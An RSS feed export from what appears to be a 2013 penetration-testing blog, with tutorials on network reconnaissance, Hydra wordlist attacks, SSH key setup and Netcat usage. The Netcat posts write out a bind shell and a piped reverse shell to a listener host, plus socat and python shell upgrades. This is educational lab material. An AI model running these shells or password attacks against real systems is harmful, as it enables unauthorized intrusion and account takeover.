Netcat – GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Mon, 20 Jan 2014 15:03:00 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 Penetration Test – Ghatering Phase. [Part 2] https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/ https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/#respond Tue, 13 Aug 2013 07:59:54 +0000 https://www.gosecure.it/blog/?p=333 read more)]]> This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 2 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 2]

Find your account
As for the hosts, users discovering can be done using many methods. You can scan Google searching for email accounts of your target company, explore corporate Web pages looking at pdf or word documents and who are the creators of this documents; if you have access to the LAN you are testing, you can try to get information from SNMP or SMTP protocol. Below are some scripts and programs that will help you, present in BT.
The harvest, by Edge-Security Research, is a very useful one. It searches for a company name in various resources database (Google, Linkedin, PGP, Bing) and can be used to extract probable username. In Figure 5 you can see the result of a research: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users.
Again by Edge-Security.com, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find users that create documents, downloadable from the domain you point at, such as docs or pdfs.

Maybe we have found some accounts

Figure 5

As well as using Web search to catch company users’ names/usernames, you can try to obtain information by SNMP or SMTP.
SNMP is a protocol based on UTP that is often used to monitor server service status. The authentication methods (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to get many information.
You can use programs such Snmpenum and Onesixtyone for this. Let’s see how they work.
Initially you have to use Onesixtyone to enumerate comunity strings; with the info collected before, make a list of hosts and write it down to a file (/tmp/hosts.txt), then point to pentest/enumeration/snmp/onesixtyone and do the following:

root@bt:pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use a file dict.txt, already present in the onesixtyone folder, to ‘brute force’ the community strings; you use the hosts file you have found before to set targets and, at the end, make a log file.
In Figure 6 you can find a sample of what you can get. In the sample you see some printers, some switches and a server (192.168.1.10).

Onesixtyone log

Figure 6

Go on and use snmpenum over 192.168.1.10 setting ‘public’ as community string, and the windows.txt template (already present) to merge output information (see Figure 7).

Snmpenum at work

Figure 7

This is just a sample, but you can get much more information than these using SNMP. You can find processes running, opened ports, system information and much more.
For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.
There are many other methods to identify users such as using SMTP server (smtpscan) and try to test the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add to your list the most common user names (root, admin, administrator).

Map the NET
Let’s have a look at network scanners, limiting us to a simple scan, with the only objective to find some services that can be used as a target.
Please, make sure to keep in mind that scanners are much more than what you will read here.
Of course, NC can be used as a network scanner, but the best programs are Unicorscan and Nmap so let’s start with the first one. The commands in Figure 8 perform a simple scan, pointing at a single target (192.168.34.135), testing common TCP (-m T) and UTP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of all the subnet 192.168.34.*, but only on FTP, SSH, SMB, and RDP ports.

Some basic scans using Unicornscan

Figure 8

You can perform the same thing using Nmap. The command nmap 192.168.34.135 scans TCP common port; if you add -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, 192.164.34.0/24 or your hosts.txt to explore all subnet or specific IPs; adding the option
-p 21-23,3389 you will limit the scan to port 21, 22, 23 and 3389. The result will be probably the same but if you try Nmap you will see more information. In addition, it can be quickly implemented to determinate what kind of program is listening over the port discovered (-sV) and what operating system is installed (-O). Please, take a look at the Nmap help to learn more options and remember that man command or help are always your friends. If you are afraid to use the Terminal, use the Nmap GUI: Zenmap.
You have to remember that every GUI is at least one layer over its command-line program; anyway let’s use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9).
Scanners make a list of hosts using FTP, another one of hosts using RDP, and so on.

Nmap GUI

Figure 9

Get the Keys
Well done! You have completed your basic network gathering phase, now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing hosts with the specific service, a password list, and a program to put everything together. You don’t have the password list, but one can be easily found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called ‘wordlist attack’: it is not the most elegant way to perform a penetration test, but it may be very incisive.
The program you can use to join your lists is Hydra (or its GUI xHydra). Figure 10 explains how it works.
Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk)
and, in the Target tab, insert the target list (e.g.FTP_hosts.txt), the port to test and the protocol (21 / FTP).

An operation diagram of the operation of THC-Hydra

Figure 10

The options ‘Show attempts’ and ‘Be verbose’ are useful to better understand what the program does. Go in the Password tab and insert the user and the password lists; don’t forget to check ‘try login as password’ and ‘try empty password’. For a basic test don’t use Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I Hope you can find some user and password association.
You can also try to extend your lists to have more chances, but remember that such attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours for a word list attack.
Anyway, if you find some associations, write them down and be ready to reuse it: users are used to use the same password for more than one service.
You can start to write a file with user:password, you will use it on Hydra in the Password tab instead of users and passwords lists. When you discover a new service, you can first use Hydra with the new file created and then the lists of users and passwords. This will speed up your work.

I hope you now have the user/password to access the FTP, SMB or, if you are lucky, the SSH, or RDP.
This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerability all over the LAN.
But what about if you can’t find anything? Don’t worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploit some vulnerability, or ARP poissoning. There are so many options that the only limit is you and every discovery is the start for the next one.

So when you open a new port, restart from the beginning, restart from sharpenning your axe.

]]>
https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/feed/ 0
Penetration Test – Ghatering Phase. [Part 1] https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/ https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/#respond Tue, 23 Jul 2013 13:17:57 +0000 https://www.gosecure.it/blog/?p=210 read more)]]> This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 3 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 1]

Abraham Lincoln said ‘Give me six hours to chop down a tree and I will spend the first four sharpening the axe’. This is really the basic concept and the start point of every penetration test.

In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more surface to attack you will have. The gathering phase isn’t the most exciting one, but surely it is the one that will let you make things better and smarter. So what do you need? Let’s see.
First, you need an adequate system with the right toolkit and a little knowledge of how they work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the Web: Youtube has a video for almost all the BT tools.
The best way to start with BT is virtualization: you can download its virtual machine ready to be started. In addition, using virtualization, you can easily start a cheap and smart LAB to perform your tests. If you already have a test network, you can also use the bootable CD.

Next you have to be calm and patient, only this way you can collect information and inspect them rightly. You can make your own check-list of tests to do or copy one from the Web, but, when you have your list, you have to follow it meticulously. Remember that you are sharpening.

Now you need to write down all the data you collected in order to have everything recorded so that you can analyze it even when you aren’t connected to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up.
I use Keepnote to keep track of all my operations and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend Netcat
Now let’s start to use the father of all tools, the famous ‘Swiss-army knife for TCP/IP: Netcat‘. Essentially, NC, is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
So why is it so important? When a PC user without experience wants to test if his machine is browsing the Internet, he opens his browser and points to a common address: www.google.com.
This is not the best test he could do, he only finds out if he is browsing, but what about if he is not browsing? So the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer.
You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8 that is the Google DNS). Is it responding? Alright, you are able to go out of your network. Next you test if your DNS is working by pinging a DNS name like www.google.com. Only if all works fine, you open your browser and test the connection. Also, from the browser you can have a problem (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all lower layers and focus on the current one.
That’s why NC is so important. It allow you to start from the lowest layer, it is the equivalent of the ping command used in the example, but it has many more applications.

Well, open your Terminal window and have a look at the NC help.

root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

At the beginning you will use options -l(set NC in listening mode), -v (verbose mode is always better) and -p (set port where NC is listening).Try this:
Open two Terminal windows in the same machine. In the first window start a service that listens
on a specific port using Netcat (it is called the listener).

root@bt:~# nc -lvp 4444

If you have a look at the network connection of your BT machine, using the command netstat -nat, you will find a listening connection on port 4444 (tcp 0.0.0.0:4444 LISTEN).
In the second window use NC as a client and connect to localhost on port 4444

root@bt:~# nc 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially, it is a simple chat. If you write something in window 1, it will redirect to windows 2 andvice versa (see Figure 1).

Netcat simple chat

Figure 1

So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.
If you have two PCs try to use NC between them or just continue the testing in the same machine (that is the lower layer).
For example, you can try to pass text:

root@bt:~# echo 'This text will be transmitted using Netcat'| nc 127.0.0.1 4444

…and if the listener is as the following, you can also
create a file with the text sent:

root@bt:~# nc -lvp 4444 > file.txt

You can also try the -c option for remote administration.
I suggest you to dig the Internet to search more about Netcat use.

Network hosts identification
As I said, finding information about the target is the base of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own hosts individuation scripts using ping and NC or use some of the wonderful tools present in BT. In my opinion, the best are Unicornscan and Nmap, but, since I will shortly explain them later, let’s explore some other programs with less possibility, but working as well.
Start using netdiscover to find live hosts. Using netdiscover -P a network scan is started using common LAN address (the one you are connected to) (see Figure 2).
Netdiscover can be also used on another network interface (-i) and IP range (-r). The -P option is useful for a better output. Netdiscover is a continuing scan tool: it scans over and over the net in order to find new hosts and it could be used to
implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C].
In a similar way you can use fping with option -g to analyze a range of IPs. Note that fping uses ICMP protocol, whereas netdiscover uses ARP protocol to locate network hosts – this is a good double check.

Netdiscover at work

Figure 2

Don’t forget to write down everything and trace all. Particularly start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with net bios name enable.
Let’s now try to find something more using DNS discovering. If you are in a domain or if you are scanning for DNS name in the Web, you can try to operate a DNS zone transfer and capture DNS records.
When you can perform this operation, you get other sensible information and, maybe, hosts not previously discovered.
The DNS transfer zone is a query that synchronizes Primary and Secondary DNS servers but if administrators misconfigure them, everyone can query for transfer and get all DNS records. DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target.
Note that you can try the zone transfer both on a local (see Figure 3) or an Internet domain (see Figure 4).
You have to notice that a DNS zone transfer, even if successfully done, does not give hackers a direct access to the servers, but gives them many information that can be useful to expand the attack surface. Look at Figure 4; the DNS transfer zone highlights at least 3 attack vectors: webmail, ftp, sftp.

DNS zone transfer on a local domain using host

Figure 3

DNSenum on a Web domain

Figure 4

It is therefore essential to block all the attacks and scans you can. Also ARP and ICMP scans must be stopped in a protected LAN. Unfortunately this isn’t always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies.
It is not easy to find balance between security and efficiency.

You have done a good hosts analysis and you have a list of IPs alive in the network. Now you can start user account identification.

[end of part 1]

You can find other NetCat info in this post

]]>
https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/feed/ 0
Setting up a ssh server on Kali linux https://www.gosecure.it/blog/art/194/note/194ssh-on-kali/ https://www.gosecure.it/blog/art/194/note/194ssh-on-kali/#comments Mon, 15 Jul 2013 22:46:35 +0000 https://www.gosecure.it/blog/?p=194 Kali Linux > System Services > SSH > sshd start... (read more)]]> Environment:
The SSH server is a Kali Linux (hostname:kali ip:10.0.0.3)
The SSH client is a Backtrack (hostname:bt ip:10.0.0.2)

Configuration:
On the Kali distribution the ssh server is already installed so I have only to start it; I can do it using the menu Applications > Kali Linux > System Services > SSH > sshd start
After that I can immediatly connect from client using the user autentication

root@bt:~# ssh root@10.0.0.3
root@10.0.0.3's password:
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Ofcourse I want to secure the SSH server, so I stop the service and I will setup SSH to use an RSA authentication.
On server I create the keys using ssh-keygen command; this will create 2 keys:
– Public key, resident on the server, in my case it is called id_rsa.pub
– Privare key, used by the client, called id_rsa

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
eb:63:b6:89:a3:74:dd:76:9f:ea:7f:1e:d4:d4:ba:9b root@kali
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|                .|
|                o|
|               o.|
|        S     ...|
|       . o    .. |
|    . . o o . .. |
|   . ..o+o . . +o|
|    ...++o .ooEo.|
+-----------------+

As I said, the private key, has to be transferred on the client. I start a Netcat listener on machine called bt

root@bt:~# nc -lp 4444 > id_rsa

On the server, the Kali machine, I connect to the listener and transfer the key

root@kali:~# nc -w 1 10.0.0.2 4444 < /root/.ssh/id_rsa

Note that NC file transfert is not a secure way to pass the key. That is why NC isn’t an encrypted channel. I use this method because I am in a lab/test environment.

On server I have to edit the file /etc/ssh/sshd_config to allow RSA authentication.

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys

Is a good idea to remove user autentication too

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

I save the file and restart the service.
The last server operation is to add the id_rsa.pub key on the file indicated on sshd_config in the field AuthorizedKeysFile

root@kali:~# cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Note that I have to add the key (>>) to the file, not to overwrite it (>), since I can have more than one publik key stored in the same file.

I move on the client and give the right permission to id_rsa (chmod 600 id_rsa). I am not used to store private keys on the default folder, but I prefer to store it in an encrypted folder and then to use the -i option of the ssh client.

Ok, let’s try the access using my new RSA key

root@bt:~# ssh root@10.0.0.3 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Remember that is good:
– To store your private keys in a protected place
– To create keys with strong password
– To hardening sshd_config (eg. disable root access)
– To take a look at the auth file log (/var/log/auth.log)

]]>
https://www.gosecure.it/blog/art/194/note/194ssh-on-kali/feed/ 3
From a non interactive shell to an interactive one https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/ https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/#respond Tue, 18 Jun 2013 10:08:59 +0000 https://www.gosecure.it/blog/?p=118 read more)]]> As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

]]>
https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/feed/ 0
Some tricks using Netcat https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/ https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/#respond Mon, 17 Jun 2013 16:02:07 +0000 https://www.gosecure.it/blog/?p=87 read more)]]> If you are here, I suppose you know that Netcat (NC) is an utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
Let’s see some exemples of use.
First of all let’s read the help output:

C:\>nc.exe -h
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

This is the Windows version of Netcat, but options are similar also in Linux. The version I found for MacOS don’t have the -e option, but you can recompile it to enable this option or use some workaround as I will explain.

First try: open two command windows in the same machine. In the first window start a service that listens on a specific port using Netcat (this is called listener)

C:\>nc.exe -l -v -p 4444

If you have a look at the network connection of your machine, using the command netstat -na, you will find a listening connection on port 4444 tcp 0.0.0.0:4444 LISTEN
In the second window use NC as a client and connect to localhost on port 4444

C:\>nc.exe 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially is a simple chat. If in window 1 you write something it will redirect to windows 2 and vice versa.
So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.

Lets try NC to pass simple text file. This time I will use Linux because of its more simple command shell, but you can implement the same thing on Windows.
So, I try to pass text file starting the folowing listener

root@kali:~# nc -lvp 4444 > file.txt

…and than connect

root@kali:~# echo "This text will be transmitted using Netcat" | nc 127.0.0.1 4444

This can be useful to create or modify remotly config file as this:

root@kali:~# nc -lp 4444 >> /etc/proxychains.conf
root@kali:~# cat new_proxy_to_add.txt | nc 127.0.0.1 4444

…or simply add something to your TODO list

root@kali:~# nc -lp 4444 >> /doc/TODO.txt
root@kali:~# echo -e "Wash girlfriend car\nBuy beer\nDebug my friend app" | nc 127.0.0.1 4444

And now let’s transfer a file (note the -w option used to end connection and to unlock the file transferred):

root@kali:~# nc -lp 4444 < myfile.zip
root@kali:~# nc -w 1 127.0.0.1 4444 > myfile_renamed.zip

Well, NC can be used to connect to listeners. If there is a service listening on some TCP/UDP port you can try to connect, and sometimes even interact with it:

root@kali:~# nc 127.0.0.1 21
220 (vsFTPd 2.3.5)
USER user-one
331 Please specify the password.
PASS ******
230 Login successful.

In some other case NC isn’t able to interact, but can be useful to grub banner and find what kind of service is listening. Look at the following command: you find a OpenSSH server on non-standard tcp port 2201.

root@kali:~# nc -v 127.0.0.1 2201
localhost [127.0.0.1] 2201 (?) open
SSH-2.0-OpenSSH_6.0p1 Debian-4

Protocol mismatch.

You can implement this idea using -z option and transfotm NC in a port scanner. You will also like to specify port range.

root@kali:~# nc -zv 127.0.0.1 1-3000
localhost [127.0.0.1] 2201 (?) open
localhost [127.0.0.1] 1111 (?) open
localhost [127.0.0.1] 80 (http) open
localhost [127.0.0.1] 21 (ftp) open

If you use the -o option you can dump all hex traffic:

root@kali:~# nc 127.0.0.1 4444 -vo /tmp/log.txt
localhost [127.0.0.1] 4444 (?) open
hello
my password is ****** yes six asterisks
^C
root@kali:~# cat /tmp/log.txt
< 00000000 68 65 6c 6c 6f 0a                               # hello.
> 00000000 6d 79 20 70 61 73 73 77 6f 72 64 20 69 73 20 2a # my password is *
> 00000010 2a 2a 2a 2a 2a 20 79 65 73 20 73 69 78 20 61 73 # ***** yes six as
> 00000020 74 65 72 69 73 6b 73 0a                         # terisks.

Let’s now talk about remote admin. You can use -e option to execute programs, in this case cmd.exe or /bin/bash.
So, start a listener in one terminal window:

c:\>nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...

…and connect to it using a second command shell:

c:\>nc.exe 127.0.0.1 4444
Microsoft Windows [Versione 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tutti i diritti riservati.

c:\>hostname
hostname
windows-pc01

c:\FAKE_Path>

You can also set the listener without -e option and use it on the client. The result will be a remore shell of the client on the machine with the listener.
Of course you can put together text/command redirection and command execution. Look at the immage below.

Image 1

We have 3 PCs: machine A and B are Linux, machine C is Windows. Let’s start 2 listeners in two different windows in Machine A; then one listener with -e option on the Windows PC. When all listeners are ready let’s put all together running the 3 clients from Machine B. we wait some seconds and … TA-DAAA! In the Machine A we have a remote shell of the Windows system. Note that pipeling in Machine B has as effect that, in Machine A, you write the command in shell 1 and read output in shell 2.
This sound like a remote shell using a proxy…

Now let’s try the MacOS Netcat version. The only preconpiled version I found is an old one, non supporting “executing command” option (-e). Although we can compile a surce code that incluce the option we want, we can also modify the previous exemple to make command execution working.
Start on a machine (IP=10.0.0.1) two shell each one with a listener.

nc -lvp 4444
nc -lvp 3333

In the remote Mac you have to admin, start a pipeling as this:

user@mymac:~$ nc 10.0.0.1 4444 | /bin/bash | nc 10.0.0.1 3333

Great! You have a remote shell of your Mac.

That’s why netcat is so important. It is so simple and so powerful that you can use it either for basic connection tests or in a complex environment, but the most important thing is that is cross-platform, single file and stand-alone program. It can also be used to implement many complex environment as proxy, sniffer, logger, secure chat, debbugger, fuzzer. You can even use it backup your disk partition on another PC (how to copy compressed drive image over network).
Nowadays there are many Netcat clones, some of these use encryption or implement the remote command execution and the use of passwords; you can easely find it googling.

Obviously not always it work as we’ll wish. One exemple overall: when we start a remote shell using NC with -e option we don’t have a FULL interactive command prompt, but a NON interactive one. To better understand try this: connect to an FTP server using NC directly. You will prompt to insert USER and then PASS and everything works, but if you try to connect to the FTP server from a remote shell (using NC aswell) you will promt to insert USER and, when you hit enter, your session will hang.
In this post you can find some solutions to reach a full interactive shell from a NC non interactive shell.

You can find more info on NetCat Home Page.

]]>
https://www.gosecure.it/blog/art/87/sec/some-tricks-using-netcat/feed/ 0